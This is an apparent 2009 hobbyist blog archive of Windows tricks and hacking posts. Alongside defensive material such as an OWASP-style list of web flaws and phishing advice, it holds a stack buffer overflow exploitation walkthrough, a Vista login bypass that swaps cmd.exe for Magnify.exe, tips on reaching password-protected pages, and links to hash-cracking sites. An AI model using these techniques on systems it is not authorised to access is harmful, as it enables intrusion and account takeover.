Step 4: The first few steps of the wizard are self explanatory. Select the following options from the successive dialog boxes. Create a new answer file; Windows unattended installation (Select the appropriate Windows version); “Fully automated”; “No this answer file will be used to install from CD”; and finally, accept the license agreement.

Step 5: Under the General Settings, you can customize the installation of Windows by providing the default name and organization, display settings, time zone and the product key. Fill in the fields using the drop-down list or by keying in the details. If you don’t select an option from the drop-down list, the default values will be used.

Step 6: After you are done click Finish and save the answer file as “winnt.sif” when you are prompted. Advanced users can further tweak the answer file by referring to the Help file called Ref.chm in the same folder.

Step 7: Finally copy the answer file to i386 folder in the Windows XP installation folder you created in the beginning.

Step 8: To burn a bootable installation disc, you need the boot sector of the Windows XP CD. Download it from here.

Step 9: Launch Nero and select CD-ROM (Boot) from the New Compilation dialog box. Under the Boot tab, specify the boot sector file you downloaded and extracted. Set the emulation as “No emulation”, and keep the boot message blank. Most importantly, remember to set the “Number of loaded sectors” as 4.

Step 10: Under the Burn tab, set the write method to disc at-once. Click the New button to to begin adding files and folders to the compilation. Drag all the contents of the Windows XP installation disc that you copied to your hard drive (with the answer file in the i386 folder) into the left pane. Insert a blank CD into the optical drive and hit burn button. Your windows automated installation Disc is ready .

Make bootable windows xp cd

Download boot file from HERE

Start Nero Burning ROM.

1.) Select CD-ROM (Boot).

2.) Select Image file from Source of boot image data.

3.) Check Enable expert settings (for advanced users only!).

4.) Set Kind of emulation: to No Emulation.

5.) Set Load segment of sectors (hex!): to 0000.

6.) Set Number of loaded sectors: to 4.

7.) Set Platform identifier: to Intel x86 compatible.

8.) Press the Browse button and Locate the BootSector file (boot.ima)

Click on the ISO tab.

- Set File name length to Max. of 31 chars (ISO Level 2).

- Set Format to Mode 1.

- Set Character Set to ISO 9660 (standard ISO CD-ROM).

- Check the Joliet check box.

- Check all Relax ISO Restrictions.

- Check Allow more than 64 characters for Joliet names

Click the Burn tab.

- Check Write.

- Check Finalize CD (No further writing possible!).

- Set Write Method to Disc-at-once. (We have had Track-At-Once work as well.)

- Click the New button.

- Select everything in the folder and drag it to the ISO compilation panel.

- Click the Write CD Dialog button

Click the Boot tab.

- Verify the settings. Correct if needed.

- Click the Burn button.

SOME USEFUL LINK FOR HACKING

2009-07-07T21:38:00.004+05:30

http://www.showmyip.com/
http://hackthespace.blogspot.com/
http://www.securitytaskforce.org/
http://www.blackhat.com/
http://www.blackhat.com/html/bh-usa-06/bh-usa-06-speakers.html
http://www.nag.co.in/ncise.htm
http://www.wtcs.org/snmp4tpc/freeware.htm
http://www.wireshark.org/
http://www.grc.com/default.htm
http://www.thinkdigit.com/index.php?action=pro_how_to&prodid=679
http://www.snort.org/
http://prasadswork.blogspot.com/
http://crack0hack.wetpaint.com/?t=anon
http://www.discoverhacking.c-o.in/
http://crack0hack.wetpaint.com/page/Best+Hacking+Softwares_+1000sw%28Free+download%29
http://www.remote-exploit.org/backtrack_download.html
http://crack0hack.wetpaint.com/rss2_0/pageReport/created?t=anon

CRACK MD5 PASSWORD HASH ONLINE

2009-07-07T20:50:00.003+05:30

Hello ,below is some links to crack md5 password hashes online .

http://gdataonline.com
http://md5.rednoize.com
http://ice.breaker.free.fr
http://www.milw0rm.com/md5/
http://shm.hard-core.pl/md5/
http://www.hashchecker.com
http://lasecwww.epfl.ch/%7Eoechslin/projects/ophcrack/
http://md5.benramsey.com
http://md5.altervista.org
http://shm.hard-core.pl
http://plain-text.info
http://www.passcracking.ru/
http://www.securitystats.com/tools/hashcrack.php
http://www.xmd5.org/index_en.htm

MAKE YOUR XP TALKING

2009-06-29T22:55:00.001+05:30

it is easy to make win xp talking
just open notepad
then
copy the this..

Dim msg, sapi
msg=InputBox("Enter your text","Talk it")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg

and save it .vbs extension
then run the file
enter the text then
its done

AUTOMATICALLY CLOSE NON-RESPONDING APPLICATION WHILE SHUTDOWNING YOUR COMPUTER

2009-06-29T22:32:00.002+05:30

HKEY_USERS.DEFAULTControl PanelDesktopValue Name: AutoEndTasks, Data
Type: REG_SZ (String Value), Value Data: (0 = disabled, 1 = enabled).
Modify the value of 'AutoEndTasks' to equal '1' to automatically end
tasks or '0' to prompt for action.
Note: This change will affect all users but the value can also be
changed on a user-by-user basis by modifying [HKEY_CURRENT_USERControl
PanelDesktop] with the same values

IMPORTANT COMPUTER TRICKS

2009-06-29T20:36:00.010+05:30

Make your own icons

It's shockingly easy to create your own icons in Windows XP. Let's do it: Click Start, click All Programs, click Accessories, and then click Paint. On the Image menu, click Attributes. Type 32 for both the Width and Height of the document, and make sure that Pixels is selected under Units. Click OK to create a new 32x32-pixel document: the size of an icon.Now add type,color, or do whatever you'd like to your image. I like to shrink photos
(headshots work best) to 32x32 and simply paste them into my Paint
document. When you're finished, open the File menu and click Save As.
Use the dialog box to choose where you want to save your file, then
give it a name followed by ".ico" (without the quotes), and click Save.
(The extension ".ico" tells Windows that it's an icon file.) You just
created an icon! Now you can change any shortcut or folder to your own
icon—just browse to it on your hard drive.

Arrange windows on your desktop

You can display any two windows side by side on the desktop by first
clicking a window's button on the Taskbar. Next, press and hold the
Ctrl key and right-click the second window that you want to open, then
click Tile Vertically. This works great when you want to view two Microsoft Word or Microsoft Internet Explorer windows at the same time.

Add the Links toolbar to My Computer

You know what would make a great toolbar? One where you could put your
favorite applications and documents so that you could open them from
any window at any time. Guess what? You can and here's how: click Start, then My Computer. Now right-click the toolbar and then click Links. You now have the Links toolbar on your windows, just like in Internet Explorer. Note: Make sure that Lock the Toolbars
is not checked. Click on it to deselect it if it is.The really cool
thing about the Links toolbar is that it's completely customizable. Try
this: Navigate to your favorite application and drag and drop its icon
to the Links toolbar. You just created a shortcut. Do this again and
again for as many applications as you want to appear on the toolbar.

Don't just maximize your windows—go full screen

When you need a really big window, don't just maximize it: go full screen! To view a window full screen, hold down the Ctrl key and double-click the window's title bar—or when the window is active, press the F11 key at the top of your keyboard—to get the biggest window possible.

BUFFER OVERFLOW: WHEN THE DATA BECOMES INSTRUCTIONS

2009-04-29T03:42:00.015+05:30

Buffer overflow is on of the oldest computer security problem. Beginning from Morris's Worm this type of remote exploitation is one of the most common and dangerous. If you look into last security holes found by big security research companies such as BugTraq or Packet Storm, you will see that minimum about 1/3 of them are buffer overflows. Buffer overflow is actual on ALL operation systems.

Let's demonstrate the buffer overflow on a small example. All code in this article written in C and must be compiled under Windows (I am using Microsoft Visual C++ 5.0).

==========================================

/* bo.exe */

#include
int oveflowing_func(char *big)
{
char vulnerable_buffer[100]; // overflowing buffer [100 bytes]
strcpy(vulnerable_buffer,big); // copy big_buffer to vulnerable_buffer
return 0; // leave function
}

int main (int argc, char *argv[])
{
char big_buffer [1024]; // buffer for keyboard input [1024 bytes]

gets(big_buffer); // entering the string from keyboard
oveflowing_func(big_buffer); // call valurnable function
return 0;
}

======================================

First the user enters the string [big_buffer], when we call [oveflowing_func] with [big_buffer] as param and in oveflowing_func we copy [big_buffer] to [vulnerable_buffer]. The main idea is that [vulnerable_buffer] is smaller than [big_buffer]. If the [big_buffer] will be bigger than 100 symbols/bytes the [vulnerable_buffer] will be overflowed and we can exploit it. Now let's compile this program as Win32 console application. So let's run it and enter the string more than 100 symbols long:

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

... in the result we get abnormal program termination and the following error message:

Exception: access violation. Address: 0x61616161

Let's see what happened. When the procedure/function is called, the program puts return address in stack. The return address points to the next command after the function call , in our example: return 0. Also in stack function keeps it's local variables. So at the moment before overflow (strcpy(valurnable_buffer,big)) stack has the following structure:

___________________
| |
_|___________________|
| | |
| | | *************************
100 bytes = | | vulnerable_buffer | !!! stack grows down !!!
| | | *************************
| |___________________ |_
| | |
| return address | | = 4 bytes
|___________________ | |
|____________________|

It's clear that strcpy(valurnable_buffer,big) with [big] large than [valurnable_buffer] will cause the change of return address.

We managed to give control to address placed in our string. Now we can create a string for input, containing a small code (processor's instructions) that will do everything we need, and by changing the return address give control to it. We have th e exploit.

At the beginning we need to know which position in the string will be placed in the return address. Using only our listing we cannot find these positions. There is two methods of finding it. We can disassembly our program, for example with Interactive Disassembler, but we need to know exactly in what function the overflow is. And there is experimental way to do it. We will use it. At first, we need to form a string with all symbols with ASCII codes from 32 to 255

=========================================
/* ascii.exe */

#include
void main(void)
{
int i;
for (i=32;i<256;i++) printf("%c",i);
}

===========================================

Pay attention to one thing: the exploit string must NOT contain the end-of-line symbols:NULL(0x00), LF(0x0a), CR(0x0c), EOF(0x1a). In case that one of this symbols will be in string the strcpy function will copy only a part of our string until these s ymbols. That's why we use codes from 32-255.

Compile and run:

c:\bo.exe | ascii.exe

And we have:

Exception: access violation. Address: 0x8b8a8988

Address 0x8b8a8988 (remember about reversed order in the machine word: from right to left:0x8b8a8988 - correct, 0x88898a8b - wrong) means that begging from 0x88 - 0x20(32) = 104th (the count begins from 0 but our string starts at 32) our string will intercept with the return address. That means - we need to form such a string that symbols in positions 104th, 105th, 106ht and 107th (size of return address is 4 bytes - machine word) will contain the address to give control to.

Now we need to decide how we will form the code. There is 2 possibilities: from the beginning to 104th and from 108th. The first method gives us only 104 bytes for code that's why we choose the second one. The string before 104th position we can fill with code of 'NOP' (No OPerand) 0x90.

Next we need to determine what address we will place instead of the return address. Let's look into registers and memory after the instruction 'RET' (= 'return' in C). Let's look into stack again:

___________________
| |
0|___________________|
| |
| | *************************
| vulnerable_buffer | !!! stack grows down !!!
| | *************************
104|___________________|
| |
| return address |
108|___________________|
|___________________| <- ESP

On the left there are positions in string. As you can see after the 'RET' command the ESP register will point to 108th position in our string. So all we need is to execute instruction: jmp esp. In order to do it we should find in memory the combination of 2 bytes: 0xff 0xe4 (jmp esp). The address of this 2 bytes will be new return address. So we have the following execution order:

RET -> JMP ESP -> exploit code

This combination can be found in the our program memory or in DLL memory area. The best variant is the first one or DLL that is connected to the program.The image of DLL in memory is placed beginning from Image base. We can easily found it using any utility analysing PE headers.

D:\exploit>listdlls bo
. . .
Base Size Version Path
0x00400000 0x27000 C:\bo.exe
0x77f60000 0x5c000 4.00.1381.0130 D:\WINNT\System32\ntdll.dll
0x77f00000 0x5e000 4.00.1381.0133 D:\WINNT\system32\KERNEL32.dll

Here Base - is Image base of the program. Now we have information about placement of program and DLLs in memory. We can search for these 2 bytes (jmp esp) in the executable file(*) or in memory(**). The last one looks more comfortable for me as we don't need to count the offset in file.
Let's use a debugger, for example Soft ICE for Windows. Run Soft ICE service and choose bo.exe and making a buffer overflow as we have done it earlier. When the exception will be raised - we will see the Soft ICE console. Let's search for our combination, type this command: s 1000000 l ffffffffff e4 - it means search for byte combination 0xff 0xe4 beginning with address 0x0100000(it's the first address that doesn't contain highest zero byte) to 0xFFFFFFFF, In result we have:

Pattern found at 0023:77f327e5 (77f327e5)

The combination was found at 0x77f327e5. Well done ! This address doesn't contain the end-of-line codes: 0x00, 0x0a, 0x0c, 0x1a, so we can easily use it. This instruction is inside KERNEL32.DLL (range from 0x77f00000-0x77f5e000) and depends on the service pack installed - probably this address will differ on your machine.

If you search it in file you will see that the bo.exe will be placed in the range 0x77f00000 : 0x77f5e000 - that means the highest byte is always zero - we cannot use these addresses.

KERNEL32.DLL is in range 0x77f00000 : 0x77f5e000 - that means: use any hex viewer and search for 0xff 0xe4 - than we add to the found offset the Image base and we will have the same result: 0x77f327e5.

Now you have everything you need: you know where to place binary code, you know what value to place instead the return address. That's all. Everything you need is to create an exploit.

10 REASONS WEBSITES GET HACKED

2009-04-28T14:39:00.005+05:30

1. Cross site scripting (XSS)

The problem: The “most prevalent and pernicious” Web application security vulnerability, XSS flaws happen when an application sends user data to a Web browser without first validating or encoding the content. This lets hackers execute malicious scripts in a browser, letting them hijack user sessions, deface Web sites, insert hostile content and conduct phishing and malware attacks.

Attacks are usually executed with JavaScript, letting hackers manipulate any aspect of a page. In a worst-case scenario, a hacker could steal information and impersonate a user on a bank’s Web site.

Real-world example: PayPal was targeted last year when attackers redirected PayPal visitors to a page warning users their accounts had been compromised. Victims were redirected to a phishing site and prompted to enter PayPal login information, Social Security numbers and credit card details.

How to protect users: Use a whitelist to validate all incoming data, which rejects any data that’s not specified on the whitelist as being good. This approach is the opposite of blacklisting, which rejects only inputs known to be bad. Additionally, use appropriate encoding of all output data. Validation allows the detection of attacks, and encoding prevents any successful script injection from running in the browser.

2. Injection flaws

The problem: When user-supplied data is sent to interpreters as part of a command or query, hackers trick the interpreter which interprets text-based commands into executing unintended commands. Injection flaws allow attackers to create, read, update, or delete any arbitrary data available to the application. In the worst-case scenario, these flaws allow an attacker to completely compromise the application and the underlying systems, even bypassing deeply nested firewalled environments.

Real-world example: Russian hackers broke into a Rhode Island government Web site to steal credit card data in January 2006. Hackers claimed the SQL injection attack stole 53,000 credit card numbers, while the hosting service provider claims it was only 4,113.

How to protect users: Avoid using interpreters if possible. If you must invoke an interpreter, the key method to avoid injections is the use of safe APIs, such as strongly typed parameterized queries and object relational mapping libraries.

3. Malicious file execution

The problem: Hackers can perform remote code execution, remote installation of rootkits, or completely compromise a system. Any type of Web application is vulnerable if it accepts filenames or files from users. The vulnerability may be most common with PHP, a widely used scripting language for Web development.

Real-world example: A teenage programmer discovered in 2002 that Guess.com was vulnerable to attacks that could steal more than 200,000 customer records from the Guess database, including names, credit card numbers and expiration dates. Guess agreed to upgrade its information security the next year after being investigated by the Federal Trade Commission.

How to protect users: Don’t use input supplied by users in any filename for server based resources, such as images and script inclusions. Set firewall rules to prevent new connections to external Web sites and internal systems.

4. Insecure direct object reference

The problem: Attackers manipulate direct object references to gain unauthorized access to other objects. It happens when URLs or form parameters contain references to objects such as files, directories, database records or keys.

Banking Web sites commonly use a customer account number as the primary key, and may expose account numbers in the Web interface.

References to database keys are frequently exposed. An attacker can attack these parameters simply by guessing or searching for another valid key. Often, these are sequential in nature.

Real-world example: An Australian Taxation Office site was hacked in 2000 by a user who changed a tax ID present in a URL to access details on 17,000 companies. The hacker e-mailed the 17,000 businesses to notify them of the security breach.

How to protect users: Use an index, indirect reference map or another indirect method to avoid exposure of direct object references. If you can’t avoid direct references, authorize Web site visitors before using them

5. Cross site request forgery

The problem simple and devastating this attack takes control of victim’s browser when it is logged onto a Web site, and sends malicious requests to the Web application. Web sites are extremely vulnerable, partly because they tend to authorize requests based on session cookies or “remember me” functionality. Banks are potential targets.

Ninety-nine percent of the applications on the Internet are susceptible to cross site request forgery.

Real-world example: A hacker known as Samy gained more than a million “friends” on MySpace.com with a worm in late 2005, automatically including the message “Samy is my hero” in thousands of MySpace pages. The attack itself may not have been that harmful, but it was said to demonstrate the power of combining cross site scripting with cross site request forgery. Another example that came to light one year ago exposed a Google vulnerability allowing outside sites to change a Google user’s language preferences.

How to protect users: Don’t rely on credentials or tokens automatically submitted by browsers. The only solution is to use a custom token that the browser will not ‘remember'.

6. Information leakage and improper error handling

The problem: Error messages that applications generate and display to users are useful to hackers when they violate privacy or unintentionally leak information about the program’s configuration and internal workings.

Web applications will often leak information about their internal state through detailed or debug error messages. Often, this information can be leveraged to launch or even automate more powerful attacks.

Real-world example: Information leakage goes well beyond error handling, applying also to breaches occurring when confidential data is left in plain sight. The ChoicePoint debacle in early 2005 thus falls somewhere in this category. The records of 163,000 consumers were compromised after criminals pretending to be legitimate ChoicePoint customers sought details about individuals listed in the company’s database of personal information. ChoicePoint subsequently limited its sales of information products containing sensitive data.

How to protect users: Use a testing tool such as OWASP’S WebScarab Project to see what errors your application generates. Applications that have not been tested in this way will almost certainly generate unexpected error output.

7. Broken authentication and session management

The problem: User and administrative accounts can be hijacked when applications fail to protect credentials and session tokens from beginning to end. Watch out for privacy violations and the undermining of authorization and accountability controls.

Flaws in the main authentication mechanism are not uncommon, but weaknesses are more often introduced through ancillary authentication functions such as logout, password management, timeout, remember me, secret question and account update .

Real-world example: Microsoft had to eliminate a vulnerability in Hotmail that could have let malicious JavaScript programmers steal user passwords in 2002. Revealed by a networking products reseller, the flaw was vulnerable to e-mails containing Trojans that altered the Hotmail user interface, forcing users to repeatedly reenter their passwords and unwittingly send them to hackers.

How to protect users: Communication and credential storage has to be secure. The SSL protocol for transmitting private documents should be the only option for authenticated parts of the application, and credentials should be stored in hashed or encrypted form.

Another tip: get rid of custom cookies used for authentication or session management.

8. Insecure cryptographic storage

The problem: Many Web developers fail to encrypt sensitive data in storage, even though cryptography is a key part of most Web applications. Even when encryption is present, it’s often poorly designed, using inappropriate ciphers.

These flaws can lead to disclosure of sensitive data and compliance violations.

Real-world example: The TJX data breach that exposed 45.7 million credit and debit card numbers. A Canadian government investigation faulted TJX for failing to upgrade its data encryption system before it was targeted by electronic eavesdropping starting in July 2005.
How to protect users: Don’t invent your own cryptographic algorithms. Only use approved public algorithms such as AES, RSA public key cryptography, and SHA-256 or better for hashing.

Furthermore, generate keys offline, and never transmit private keys over insecure channels.

9. Insecure communications

The problem: Similar to No. 8, this is a failure to encrypt network traffic when it’s necessary to protect sensitive communications. Attackers can access unprotected conversations, including transmissions of credentials and sensitive information. For this reason, PCI standards require encryption of credit card information transmitted over the Internet.

Real-world example: TJX again. Investigators believe hackers used a telescope-shaped antenna and laptop computer to steal data exchanged wirelessly between portable price-checking devices, cash registers and store computers, the Wall Street Journal reported.

“The $17.4-billion retailer’s wireless network had less security than many people have on their home networks,” the Journal wrote. TJX was using the WEP encoding system, rather than the more robust WPA.

How to protect users: Use SSL on any authenticated connection or during the transmission of sensitive data, such as user credentials, credit card details, health records and other private information. SSL or a similar encryption protocol should also be applied to client, partner, staff and administrative access to online systems. Use transport layer security or protocol level encryption to protect communications between parts of your infrastructure, such as Web servers and database systems.

10. Failure to restrict URL access

The problem: Some Web pages are supposed to be restricted to a small subset of privileged users, such as administrators. Yet often there’s no real protection of these pages, and hackers can find the URLs by making educated guesses.

The attacks targeting this vulnerability are called forced browsing, which encompasses guessing links and brute force techniques to find unprotected pages.

Real-world example: A hole on the Macworld Conference & Expo Web site this year let users get “Platinum” passes worth nearly $1,700 and special access to a Steve Jobs keynote speech, all for free. The flaw was code that evaluated privileges on the client but not on the server, letting people grab free passes via JavaScript on the browser, rather than the server.

How to protect users: Don’t assume users will be unaware of hidden URLs. All URLs and business functions should be protected by an effective access control mechanism that verifies the user’s role and privileges. Make sure this is done … every step of the way, not just once towards the beginning of any multistage process.

WINDOWS VISTA PASSWORD HACK

2009-04-22T10:17:00.002+05:30

1. Insert the Windows Vista DVD into the DVD drive and then restart the computer.
2. Change Boot Options 1st Priority to Optical Drive.
3. When system booting up, if the message “Press any key to boot from cd” appears,immediately press Enter.
4. On Language Settings, Time and Currency and Keyboard Layout screen, just choose the correct settings then click Next.
5. On Install Now screen, click Repair. Note: Click No just in case you get the message: Windows found problems with your computer’s startup options.
6. On the System Recovery Options screen, under Operating System, click Windows Vista then click Next. Then select Command Prompt.
7. At the command prompt windows, type the following command then press Enter after typing each command:
c:
cd windows\system32
echo ~takeown /f %1 /r /d y > TakeControlOf.cmd
echo ~icacls %1 /grant administrators:F /t
ren Magnify.exe Magnify.old
ren cmd.exe Magnify.exe
8. Restart the computer.
9. On the Welcome Screen, click the Ease button.
10. Check Make items on the screen larger then click OK.
11. At the prompt, type the command then press Enter.

net user Administrator /active:yes
exit
12. Restart the computer.
13. At the welcome screen, logon using the local administrator account.
14. Access Control Panel then click User Accounts. Select the username of the account you can’t login to then remove the password.
15. Log off on the current local administrator account your are logon to.
16. Check if you can logon to your user account now.
17. Open c:\windows\system32.
18. Right click on Magnify.exe, select Properties -> Security -> Advanced -> Owner -> Edit -> Administrators then click OK.
19. Select Edit -> Administrators -> Full Control then click Apply then OK.
20. Rename Magnify.old to Magnify.exe
21. Open command prompt then type the command then press Enter.
net user Administrator /active:no

HACKING PASSWORD PROTECTED SITES

2009-04-17T06:48:00.001+05:30

There are many ways to defeat java-script protected web
sites. Some are very simplistic, such as hitting ctl-alt-del
when the password box is displayed, to simply turning off
java capability, which will dump you into the default page.
You can try manually searching for other directories, by
typing the directory name into the url address box of your
browser,ie: you want access to www.target.com . Try typing
www.target.com/images .(almost every web site has an images
directory) This will put you into the images directory,
and give you a text list of all the images located there.
Often, the title of an image will give you a clue to the
name of another directory. ie: in www.target.com/images,
there is a .gif named gamestitle.gif . There is a good
chance then, that there is a 'games' directory on the site,
so you would then type in www.target.com/games, and if it is
a valid directory, you again get a text listing of all the
files available there.For a more automated approach, use a
program like WEB SNAKE from anawave, or Web Wacker. These
programs will create a mirror image of an entire web site,
showing all directories,or even mirror a complete server.
They are indispensable for locating hidden files and directories.
What do you do if you can't get past an opening "Password
Required" box? First do an WHOIS Lookup for the site. In our
example, www.target.com . We find it's hosted by www.host.com
at 100.100.100. 1. We then go to 100.100.100.1, and then launch
Web Snake, and mirror the entire server. Set Web Snake to NOT
download anything over about 20K. (not many HTML pages are
bigger than this) This speeds things up some, and keeps you
from getting a lot of files and images you don't care about.
This can take a long time, so consider running it right before bed
time.Once you have an image of the entire server, you look through
the directories listed, and find /target. When we open that
directory, we find its contents, and all of its sub-directories listed.
Let's say we find /target/games/zip/zipindex.html . This would be the
index page that would be displayed had you gone through the
password procedure, and allowed it to redirect you here.
By simply typing in the url www.target.com/games/zip/zipindex.html
you will be on the index page and ready to follow the links
for downloading.

EMAIL TRACKING

2009-04-12T21:01:00.002+05:30

Find out email sent by u is read or not.

Now you can find out when your email has been read by the recipient! No more guessing: "Has he or she read my email yet?"

SpyPig is a simple email tracking system that sends you a notification email as soon as the recipient opens and reads your message.

It works with virtually all modern email programs: Outlook, Eudora, Yahoo Email, Gmail, Hotmail, AOL Email and many others.

Best of all, SpyPig is FREE! No spam, no virus, no adware। You can use it as often as you like, and there's no catch.

The system is very easy to use. In just few minutes, you'll be able to use it like a real spy!

To start using SpyPig, follow the simple steps in the SpyPig Farm .

TEST OF ANTIVIRUS WORKING PROPERLY OR NOT.

2009-04-12T20:52:00.002+05:30

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Open notepad.Copy the above code in the file.
Then save it with the name fakevirus.exe
If this file got deleted immediately .That means your antivirus is working properly.

SHUTDOWN YOUR COMPUTER IN 3 SECONDS.

2009-04-12T20:44:00.000+05:30

You can shutdown your computer within 3seconds.. yes it is possible.. simple trick
follow the steps:

1.press Ctrl+Alt+Del. It opens task manager.

2.Go to shutdown Tab.

3.Now Press and HOLD Ctrl key and then click TURN OFF option.

NOW YOUR COMPUTER WILL TURN OFF WITHIN FEW SECONDS.

SPEED OF YOUR MOBILE 2 TIMES

2009-04-12T20:30:00.004+05:30

THIS IS ONLY FOR THOSE USER WHICH HAVE MEMORY CARD IN THEIR PHONES.
FIRST NEED A COMPUTER.
-USB CONNECTIVITY of MEMORY CARD TO PC(CARD READER) NOT BLUE TOOTH

FOLLOWS THESE STEPS.
1.REMOVE MEMORY CARD FROM MOBILE.

2.INSERT IT IN CARD READER.

3.OPEN start menu>All program>accessories>system tools>DISK DEFRAGMENTER

4.JUST RUN DEFRAGMENTER AT YOUR MEMORY CARD.

5.FRAGMENT IT 2 OR 3 TIMES.

6.PUT BACK THE MEMORY CARD IN PHONE.

7.ENJOY THE "SPEED."

HOW TO SKIP THE "30 SECOND WAIT" TIME IN RAPIDSHARE

2009-04-12T20:25:00.002+05:30

Firstly, Your going to have to get Firefox:
http://www.mozilla.com/en-US/

After you've installed it, you will need to get the Firefox add-on, Greasemonkey:
https://addons.mozilla.org/en-US/firefox/addon/748

Lastly, you will need to install the Rapidshare waitskipper script, which you can get here:
http://userscripts.org/scripts/source/38279.user.js

USE GOOGLE FOR DIRECT DOWNLOADS INSTEAD OF TORRENTS

2009-04-12T10:52:00.003+05:30

Torrents are fun.Downloading from torrents however has a negative side. The download speed may be capped, there are port forwarding issues. Upload is mandatory and you may not have a good seeders to peers ratio.

Using G2P.org (a take on P2P - stands for Google-to-peer) allows you to search the web (via Google) for files you want. The concept behind it is simplicity itself - it uses special search operators to search Google for files you want in openly listed directories on Apache servers.

So you can search for songs, ebooks, softwares etc using G2P and get direct downloads! G2P is not a search engine but simply a front end to one which makes searching for ’stuff’ easier. The data is hosted on by others listed in open directories; you may or may not find what you’re looking for. But for one off cases where you need to download something quickly without bothering about finding seeds .

ALL ABOUT SSL

2009-03-31T18:30:00.006+05:30

Secure Sockets Layer (SSL) is the most widely used technology for providing a secure communication between the web client and the web server.Most of us are familiar with many sites such as Gmail, Yahoo etc. using https protocol in their login pages.When we see this, we may wonder what’s the difference between http and https.In simple words HTTP protocol is used for standard communication between the Web server and the client. HTTPS is used for a SECURE communication.
What exactly is Secure Communication ?

Suppose there exists two communication parties A (client) and B (server).

Working of HTTP

When A sends a message to B, the message is sent as a plain text in an unencrypted manner.This is acceptable in normal situations where the messages exchanged are not confidential.But imagine a situation where A sends a PASSWORD to B.In this case, the password is also sent as a plain text.This has a serious security problem because, if an intruder (hacker) can gain unauthorised access to the ongoing communication between A and B , he can see the PASSWORDS since they remain unencrypted.This scenario is illustrated using the following figure.

Now lets see the working of HTTPS

When A sends a PASSWORD (say “mypass“) to B, the message is sent in an encrypted format.The encrypted message is decrypted on B’s side.So even if the Hacker gains an unauthorised access to the ongoing communication between A and B he gets only the encrypted password (”xz54p6kd“) and not the original password.This is shown below.

How is HTTPS implemented ?

HTTPS is implemented using Secure Sockets Layer (SSL).A website can implement HTTPS by purchasing an SSL Certificate.Secure Sockets Layer (SSL) technology protects a Web site and makes it easy for the Web site visitors to trust it. It has the following uses

1. An SSL Certificate enables encryption of sensitive information during online transactions.
2. Each SSL Certificate contains unique, authenticated information about the certificate owner.
3. A Certificate Authority verifies the identity of the certificate owner when it is issued.

How Encryption Works ?

Each SSL Certificate consists of a Public key and a Private key. The public key is used to encrypt the information and the private key is used to decrypt it.When your browser connects to a secure domain, the server sends a Public key to the browser to perform the encryption.The public key is made available to every one but the private key(used for decryption) is kept secret.So during a secure communication, the browser encrypts the message using the public key and sends it to the server.The message is decrypted on the server side using the Private key(Secret key).

How to identify a Secure Connection ?

In Internet Explorer, you will see a lock icon in the Security Status bar. The Security Status bar is located on the right side of the Address bar.You can click the lock to view the identity of the website.

In high-security browsers, the authenticated organization name is prominently displayed and the address bar turns GREEN when an Extended Validation SSL Certificate is detected. If the information does not match or the certificate has expired, the browser displays an error message or warning and the status bar may turn RED.

So the bottom line is, whenever you perform an online transaction such as Credit card payment, Bank login or Email login always ensure that you have a secure communication.A secure communication is a must in these situations.Otherwise there are chances of Phishing using a Fake login Page.

ALL ABOUT PHISHING ATTACK

2009-03-31T18:10:00.002+05:30

Phishing is an attempt to criminally and fraudulently acquire sensitive information, such as usernames, passwords and credit card details, by appearing as a trustworthy entity in an electronic communication. eBay, PayPal and other online banks are common targets. Phishing is typically carried out by email or instant messaging and often directs users to enter details at a website, although phone contact has also been used. Phishing is an example of social engineering techniques used to fool users.Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical measures.

Recent phishing attempts have targeted the customers of banks and online payment services.Social networking sites such as Orkut are also a target of phishing.

Spoofed/Fraudulent e-mails are the most widely used tools to carry out the phishing attack.In most cases we get a fake e-mail that appears to have come from a Trusted Website . Here the hacker may request us to verify username & password by replaying to a given email address.
TECHNIQUES BEHIND PHISHING ATTACK

1.Link Manipulation
Most methods of phishing use some form of technical deception designed to make a link in an email appear to belong to some trusted organization or spoofed organization. Misspelled URLs or the use of subdomains are common tricks used by phishers, such as this example URL

www.micosoft.com

www.mircosoft.com

www.verify-microsoft.com

instead of http://www.microsoft.com/

2.Filter Evasion

Phishers have used images instead of text to make it harder for anti-phishing filters to detect text commonly used in phishing emails.This is the reason Gmail or Yahoo will disable the images by default for incoming mails.
How does a phishing attack/scam look like?
As scam artists become more sophisticated, so do their phishing e-mail messages and pop-up windows.They often include official-looking logos from real organizations and other identifying information taken directly from legitimate Web sites.

Example of a phishing e-mail message, including a deceptive URL address linking to a scam Web site.
To make these phishing e-mail messages look even more legitimate, the scam artists may place a link in them that appears to go to the legitimate Web site (1), but it actually takes you to a phishing site (2) or possibly a pop-up window that looks exactly like the official site.
These copycat sites are also called “spoofed” Web sites. Once you’re at one of these spoofed sites, you may send personal information to the hackers.

How to identify a fraudulent e-mail?

Here are a few phrases to look for if you think an e-mail message is a phishing scam.

“Verify your account.”

Legitimate sites will never ask you to send passwords, login names, Social Security numbers, or any other personal information through e-mail.

“If you don’t respond within 48 hours, your account will be closed.”

These messages convey a sense of urgency so that you’ll respond immediately without thinking.

“Dear Valued Customer.”
Phishing e-mail messages are usually sent out in bulk and often do not contain your first or last name.

“Click the link below to gain access to your account.”
HTML-formatted messages can contain links or forms that you can fill out just as you’d fill out a form on a Web site. The links that you are urged to click may contain all or part of a real company’s name and are usually “masked,” meaning that the link you see does not take you to that address but somewhere different, usually a scam Web site.

So the Bottom line to defend from phishing attack is
1.Never assume that an email is valid based on the sender’s email address.
2.A trusted bank/organization such as paypal will never ask you for your full name and password in a PayPal email.
3.An email from trusted organization will never contain attachments or software.
4.Clicking on a link in an email is the most insecure way to get to your account.

FIX CORRUPTED FILES IN XP

2009-03-30T05:53:00.003+05:30

This tutorial has been made so people that are having problems
with corrupted files, can learn how to fix them easy.

// Required //
+ Windows XP operating system
+ Windows XP cd

//Steps //

+ Place the xp cd in your cd/dvd drive
+ Go to start
+ run
+ type in 'sfc /scannow' (without the ')

Now it should all load,and fix all your corrupted file on windows XP.

MULTIPLE MAIL ID OR ORKUT LOG IN AT A TIME

2009-03-30T04:57:00.003+05:30

Do you ever need to check two different accounts of same service, at the same time?
